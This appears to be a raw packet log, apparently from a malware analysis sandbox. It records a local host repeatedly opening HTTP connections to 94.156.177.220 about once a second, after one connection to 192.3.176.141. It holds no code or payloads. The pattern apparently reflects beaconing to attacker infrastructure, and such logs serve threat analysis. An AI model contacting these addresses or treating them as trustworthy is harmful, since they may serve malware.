Oct 25, 2024 19:51:48.325644016 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:48.325645924 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.325665951 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:48.395112991 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.395323038 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:48.473381996 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:50.131119967 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:50.137764931 CEST	80	49176	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:50.137828112 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:50.139506102 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:50.145159960 CEST	80	49176	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:50.145220995 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:50.150619030 CEST	80	49176	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:51.113399029 CEST	80	49176	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:51.113562107 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:51.119517088 CEST	80	49176	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:51.119577885 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:51.223742008 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:51.607055902 CEST	80	49177	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:51.607148886 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:51.609496117 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:51.616348982 CEST	80	49177	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:51.616426945 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:51.622103930 CEST	80	49177	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:52.585231066 CEST	80	49177	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:52.585611105 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:52.591423035 CEST	80	49177	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:52.591506958 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:52.658334017 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:52.663836002 CEST	80	49178	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:52.663908958 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:52.666205883 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:52.671595097 CEST	80	49178	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:52.671652079 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:52.677103043 CEST	80	49178	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:53.648555040 CEST	80	49178	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:53.648713112 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:53.654784918 CEST	80	49178	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:53.654958963 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:53.888900995 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:53.899782896 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:53.899842978 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:53.902439117 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:53.908370972 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:53.908423901 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:53.913992882 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:55.136472940 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:55.136615992 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:55.136764050 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:55.136816025 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:55.136957884 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:55.137006998 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:55.147530079 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:55.317437887 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:55.323154926 CEST	80	49180	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:55.323235035 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:55.324877977 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:55.330576897 CEST	80	49180	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:55.330638885 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:55.336299896 CEST	80	49180	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:56.284284115 CEST	80	49180	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:56.284538984 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:56.315084934 CEST	80	49180	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:56.315144062 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:56.420897961 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:56.426367998 CEST	80	49181	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:56.426446915 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:56.428042889 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:56.433650970 CEST	80	49181	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:56.433698893 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:56.439158916 CEST	80	49181	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:57.409168005 CEST	80	49181	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:57.409276009 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:57.420553923 CEST	80	49181	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:57.420609951 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:57.544250965 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:57.551070929 CEST	80	49182	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:57.551141977 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:57.552912951 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:57.559705973 CEST	80	49182	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:57.559758902 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:57.566782951 CEST	80	49182	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:58.522156954 CEST	80	49182	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:58.522255898 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:58.528171062 CEST	80	49182	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:58.528228998 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:59.242934942 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:59.249557972 CEST	80	49183	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:59.249613047 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:59.251210928 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:59.256761074 CEST	80	49183	94.156.177.220	192.168.2.22
Oct 25, 2024 19:51:59.256820917 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:51:59.262160063 CEST	80	49183	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:00.220825911 CEST	80	49183	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:00.220923901 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:00.226865053 CEST	80	49183	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:00.226912975 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:00.361124992 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:00.366790056 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:00.366859913 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:00.368541956 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:00.374036074 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:00.374097109 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:00.379467964 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:01.343830109 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:01.346124887 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:01.352272034 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:01.352332115 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:01.481641054 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:01.488204002 CEST	80	49185	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:01.488274097 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:01.489933968 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:01.495538950 CEST	80	49185	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:01.495589972 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:01.501106024 CEST	80	49185	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:02.484688044 CEST	80	49185	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:02.484796047 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:02.491874933 CEST	80	49185	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:02.491923094 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:02.911287069 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:02.917435884 CEST	80	49186	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:02.917587042 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:02.919217110 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:02.924597025 CEST	80	49186	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:02.924654961 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:02.930583954 CEST	80	49186	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:03.890964985 CEST	80	49186	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:03.891130924 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:03.896822929 CEST	80	49186	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:03.896914959 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:04.026293993 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:04.034990072 CEST	80	49187	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:04.035155058 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:04.037992001 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:04.043740988 CEST	80	49187	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:04.043801069 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:04.049216986 CEST	80	49187	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:05.006691933 CEST	80	49187	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:05.006829023 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:05.014451981 CEST	80	49187	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:05.014517069 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:05.170556068 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:05.176019907 CEST	80	49188	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:05.176091909 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:05.177855015 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:05.183259010 CEST	80	49188	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:05.183331013 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:05.188754082 CEST	80	49188	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:06.184935093 CEST	80	49188	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:06.185045004 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:06.190968037 CEST	80	49188	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:06.191032887 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:06.338145018 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:06.343866110 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:06.343950987 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:06.345585108 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:06.351068974 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:06.351135969 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:06.356544971 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:07.663984060 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:07.664194107 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:07.664910078 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:07.665024042 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:07.665216923 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:07.665280104 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:07.672683954 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:07.810340881 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:07.815890074 CEST	80	49190	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:07.815959930 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:07.818367958 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:07.823858023 CEST	80	49190	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:07.823914051 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:07.829437971 CEST	80	49190	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:08.793823004 CEST	80	49190	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:08.794008970 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:08.800241947 CEST	80	49190	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:08.800314903 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:08.960011005 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:08.965676069 CEST	80	49191	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:08.965759993 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:08.968086958 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:08.973582029 CEST	80	49191	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:08.973694086 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:08.979101896 CEST	80	49191	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:10.024930954 CEST	80	49191	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:10.025132895 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:10.031534910 CEST	80	49191	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:10.031636953 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:10.363276958 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:10.368902922 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:10.368973970 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:10.373667002 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:10.379956007 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:10.380036116 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:10.385617971 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:11.347244024 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:11.347348928 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:11.356894016 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:11.356967926 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:11.495728016 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:12.490252972 CEST	80	49193	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:12.490382910 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:12.493413925 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:12.508325100 CEST	80	49193	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:12.508411884 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:12.513873100 CEST	80	49193	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:13.456581116 CEST	80	49193	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:13.456768990 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:13.462574959 CEST	80	49193	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:13.462682962 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:13.609466076 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:13.962030888 CEST	80	49194	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:13.962148905 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:13.967932940 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:13.973385096 CEST	80	49194	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:13.973613024 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:13.978964090 CEST	80	49194	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:14.950884104 CEST	80	49194	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:14.951162100 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:14.956948042 CEST	80	49194	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:14.957011938 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:15.111217976 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:15.116930008 CEST	80	49195	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:15.117130995 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:15.119479895 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:15.125157118 CEST	80	49195	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:15.125319004 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:15.132472038 CEST	80	49195	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:16.081203938 CEST	80	49195	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:16.081321001 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:16.087517977 CEST	80	49195	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:16.087626934 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:16.229568958 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:16.235107899 CEST	80	49196	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:16.235188961 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:16.236784935 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:16.242216110 CEST	80	49196	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:16.242299080 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:16.247715950 CEST	80	49196	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:17.296941042 CEST	80	49196	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:17.297036886 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:17.330750942 CEST	80	49196	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:17.330815077 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:17.439564943 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:17.445171118 CEST	80	49197	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:17.445252895 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:17.446836948 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:17.452349901 CEST	80	49197	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:17.452451944 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:17.457861900 CEST	80	49197	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:18.438119888 CEST	80	49197	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:18.438249111 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:18.444629908 CEST	80	49197	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:18.444705963 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:18.576344013 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:18.581877947 CEST	80	49198	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:18.581964016 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:18.583517075 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:18.588866949 CEST	80	49198	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:18.588953018 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:18.594309092 CEST	80	49198	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:19.554600954 CEST	80	49198	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:19.554707050 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:19.560466051 CEST	80	49198	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:19.560527086 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:19.683615923 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:19.689152002 CEST	80	49199	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:19.689254045 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:19.690922976 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:19.696383953 CEST	80	49199	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:19.696573019 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:19.701917887 CEST	80	49199	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:20.718924046 CEST	80	49199	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:20.719022989 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:20.735096931 CEST	80	49199	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:20.735146999 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:20.851991892 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:20.857407093 CEST	80	49200	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:20.857486010 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:20.859158039 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:20.864531994 CEST	80	49200	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:20.864617109 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:20.870174885 CEST	80	49200	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:21.835601091 CEST	80	49200	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:21.835783958 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:21.842412949 CEST	80	49200	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:21.842585087 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:21.984102011 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:21.989552021 CEST	80	49201	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:21.989630938 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:21.991240025 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:21.996630907 CEST	80	49201	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:21.996702909 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:22.002753019 CEST	80	49201	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:22.952907085 CEST	80	49201	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:22.953058004 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:22.959302902 CEST	80	49201	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:22.959388971 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:23.130486965 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:23.136182070 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:23.136254072 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:23.137924910 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:23.143918991 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:23.143979073 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:23.149430990 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:24.369417906 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:24.369508028 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:24.370764017 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:24.370796919 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:24.370810032 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:24.370846033 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:24.381623983 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:24.526592016 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:24.532033920 CEST	80	49203	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:24.532087088 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:24.533739090 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:24.540059090 CEST	80	49203	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:24.540107965 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:24.545777082 CEST	80	49203	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:25.509913921 CEST	80	49203	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:25.510015011 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:25.516182899 CEST	80	49203	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:25.516287088 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:25.711813927 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:25.717499018 CEST	80	49204	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:25.717600107 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:25.733125925 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:25.739912033 CEST	80	49204	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:25.739974022 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:25.745405912 CEST	80	49204	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:26.666554928 CEST	80	49204	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:26.666692972 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:26.672544956 CEST	80	49204	94.156.177.220	192.168.2.22
